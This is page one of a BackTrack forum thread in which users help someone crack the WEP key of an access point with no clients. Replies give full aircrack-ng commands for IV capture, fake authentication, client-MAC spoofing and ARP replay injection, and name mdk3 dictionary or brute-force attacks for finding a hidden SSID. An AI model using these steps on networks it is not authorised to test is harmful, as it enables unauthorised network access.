Page 1 of 2 12 LastLast
Results 1 to 10 of 14

Thread: Cracking WEP with no client

  1. #1
    Just burned his ISO
    Join Date
    Jan 2010
    Posts
    3

    Default Cracking WEP with no client

    I my test lab I have a AP with no clients connected to it, and I want to crack the WEP key by rebroadcasting the packet that I receive from the AP. I'll finally convert the broadcast packet so that the AP can generates a new IV.

    Before this attacks works, I first need to perform a fake authentication. This succeeds when I know the ESSID.

    So, question is How can I successfully authenticates without knowing the ESSID and no wireless clients are connected ?

    cheers
    Damien

  2. #2
    Very good friend of the forum TAPE's Avatar
    Join Date
    Jan 2010
    Location
    Europe
    Posts
    599

    Default

    Check the latest video in BT4 video section...

  3. #3
    Just burned his ISO
    Join Date
    Oct 2009
    Posts
    1

    Default

    Quote Originally Posted by DamienThorn View Post
    I my test lab I have a AP with no clients connected to it, and I want to crack the WEP key by rebroadcasting the packet that I receive from the AP. I'll finally convert the broadcast packet so that the AP can generates a new IV.

    Before this attacks works, I first need to perform a fake authentication. This succeeds when I know the ESSID.

    So, question is How can I successfully authenticates without knowing the ESSID and no wireless clients are connected ?

    cheers
    Damien
    oh yes.. thats a really nice question,..
    hi everybody. name is andre, im new in backtrack.

    can any body please help to tell me like Damien .


    thanks.
    Gbu.

  4. #4
    Just burned his ISO htons139's Avatar
    Join Date
    Sep 2008
    Posts
    23

    Default

    first sure start airodump-ng then run

    aireplay-ng -1 10 -a xx:xx:xx:xx:xx:xx mon0

    insert the AP mac address and ur injection enabled ethernet card in place of mon0

    Then start aireplay in arp replay mode and watch for magic!
    In a world where data is the coin of the realm, and transmissions are guarded by no better sentinels
    than man-made codes and corruptible devices, there is no such thing as a secret

  5. #5
    Just burned his ISO
    Join Date
    Jan 2010
    Posts
    3

    Default

    I have no luck, when I launch the fake auth attack, I get always the message Please specify an ESSID, even when I specify -h and the mac of my machine. So, association was not sucessful.

    When I then launch aireplay-ng using arp reply, I got disassociation messages.

    Any suggestions ?

  6. #6
    Just burned his ISO htons139's Avatar
    Join Date
    Sep 2008
    Posts
    23

    Thumbs up

    Quote Originally Posted by DamienThorn View Post
    I have no luck, when I launch the fake auth attack, I get always the message Please specify an ESSID, even when I specify -h and the mac of my machine. So, association was not sucessful.

    When I then launch aireplay-ng using arp reply, I got disassociation messages.

    Any suggestions ?
    Sorry for confusing you with my other post, you should use "-a" and not "-b" (been corrected in the older post), try that and aireplay-ng should not ask for th essid.

    Now for the long version of the reply
    -------------------------------------------------
    Your case

    1-You have an AP that is broadcasting its bssid
    2- You have no mac addresses of connected clients (even from other, older session not necessarily at the moment of the attach)

    The Attack:

    A- Start collecting ivs

    airodump-ng --ivs -w filename --bssid xx:xx:xx:xx:xx:xx --channel XX mon0

    make sure you insert the AP bssid in place of xx:xx:xx:xx:xx:xx, the channel number in place of XX, and the name of your injection enabled NIC in place of mon0

    B- Run aireplay in fake auth mode

    aireplay-ng -1 10 -a xx:xx:xx:xx:xx:xx mon0

    Insert the AP mac address and the name of you NIC.

    If the Access point does not have mac filtering, then you will be able to use the fake authentication attack without the -h argument, otherwise this attack will not work unless you use

    aireplay-ng -1 10 -a xx:xx:xx:xx:xx:xx -h yy:yy:yy:yy:yy:yy mon0

    where yy:yy:yy:yy:yy:yy is the mac address of an already connected client (NOT YOUR NIC MAC)

    C- finally run aireplay in arp replay mode

    aireplay-ng -3 -b xx:xx:xx:xx:xx:xx mon0

    again, replace xx:xx:xx:xx:xx:xx with the AP mac and mon0 with your nic name.

    Good luck
    In a world where data is the coin of the realm, and transmissions are guarded by no better sentinels
    than man-made codes and corruptible devices, there is no such thing as a secret

  7. #7
    Just burned his ISO
    Join Date
    Jan 2010
    Posts
    3

    Default

    Your situation works if the AP is broadcasting its ESSID, but the case is :

    1) The AP does not broadcast its ESSID
    2) There are no wireless clients connected to the AP

    So, in your step B, I cannot use -h YY:YY, since there are no wireless clients

  8. #8
    Just burned his ISO htons139's Avatar
    Join Date
    Sep 2008
    Posts
    23

    Default

    ESSID
    The Extended Service Set ID (ESSID) is the name of the network you want to access. It is used to identify different wireless networks.

    BSSID
    The BSSID is a 48bit identity used to identify a particular BSS (Basic Service Set) within an area.

    It is clear you need to do some more reading... these are basics you should be informed about... do your home work and ask me no more questions before you do so
    In a world where data is the coin of the realm, and transmissions are guarded by no better sentinels
    than man-made codes and corruptible devices, there is no such thing as a secret

  9. #9
    Very good friend of the forum TAPE's Avatar
    Join Date
    Jan 2010
    Location
    Europe
    Posts
    599

    Default

    ^
    Dude, you are misreading the OPs question completely..
    reading abilities.. hmm..

    He is talking about a network that is not broadcasting the ESSID..
    So a hidden ssid..


    There are a couple of options to try and find out what the essid is ;

    1. You do a dictionary attack on the network using mdk3.
    2. You do a bruteforce attack on the network using mdk3
    (not recommended for any ssid over 4 characters..)
    3. You monitor the network and wait for someone to probe it / associate with it.



    So at Damien ;

    When you are running airodump and checking your network, is it mentioning a length 0 ssid, or length 5 or some other value.

    If you can actually see how many characters it is. you can decide on whether to use a bruteforce option. If it is length 0 then you will not know, so would need to try the dictionary approach.

    Again.. I posted a vid on that specific situation ;
    http://forums.remote-exploit.org/bt4...track-4-a.html

    Check it out, and obviously, as you know the essid of your network, you can alter wordlists etc to suit the best method of the above.

  10. #10
    Just burned his ISO
    Join Date
    Jun 2009
    Posts
    8

    Default Error at 'replay-ng

    Quote Originally Posted by htons139 View Post
    Sorry for confusing you with my other post, you should use "-a" and not "-b" (been corrected in the older post), try that and aireplay-ng should not ask for th essid.

    Now for the long version of the reply
    -------------------------------------------------
    Your case

    1-You have an AP that is broadcasting its bssid
    2- You have no mac addresses of connected clients (even from other, older session not necessarily at the moment of the attach)

    The Attack:

    A- Start collecting ivs

    airodump-ng --ivs -w filename --bssid xx:xx:xx:xx:xx:xx --channel XX mon0

    make sure you insert the AP bssid in place of xx:xx:xx:xx:xx:xx, the channel number in place of XX, and the name of your injection enabled NIC in place of mon0

    B- Run aireplay in fake auth mode

    aireplay-ng -1 10 -a xx:xx:xx:xx:xx:xx mon0

    Insert the AP mac address and the name of you NIC.

    If the Access point does not have mac filtering, then you will be able to use the fake authentication attack without the -h argument, otherwise this attack will not work unless you use

    aireplay-ng -1 10 -a xx:xx:xx:xx:xx:xx -h yy:yy:yy:yy:yy:yy mon0

    where yy:yy:yy:yy:yy:yy is the mac address of an already connected client (NOT YOUR NIC MAC)

    C- finally run aireplay in arp replay mode

    aireplay-ng -3 -b xx:xx:xx:xx:xx:xx mon0

    again, replace xx:xx:xx:xx:xx:xx with the AP mac and mon0 with your nic name.

    Good luck
    I've been attempting to do this very thing yet when attempting this [code: airodump-ng --ivs -w filename --bssid xx:xx:xx:xx:xx:xx --channel XX mon0] I get "Invalid output format :IV's and PCAP format cannot be used together". What am I doing wrong? Thanks in advance for handing down the knowledge.

Page 1 of 2 12 LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •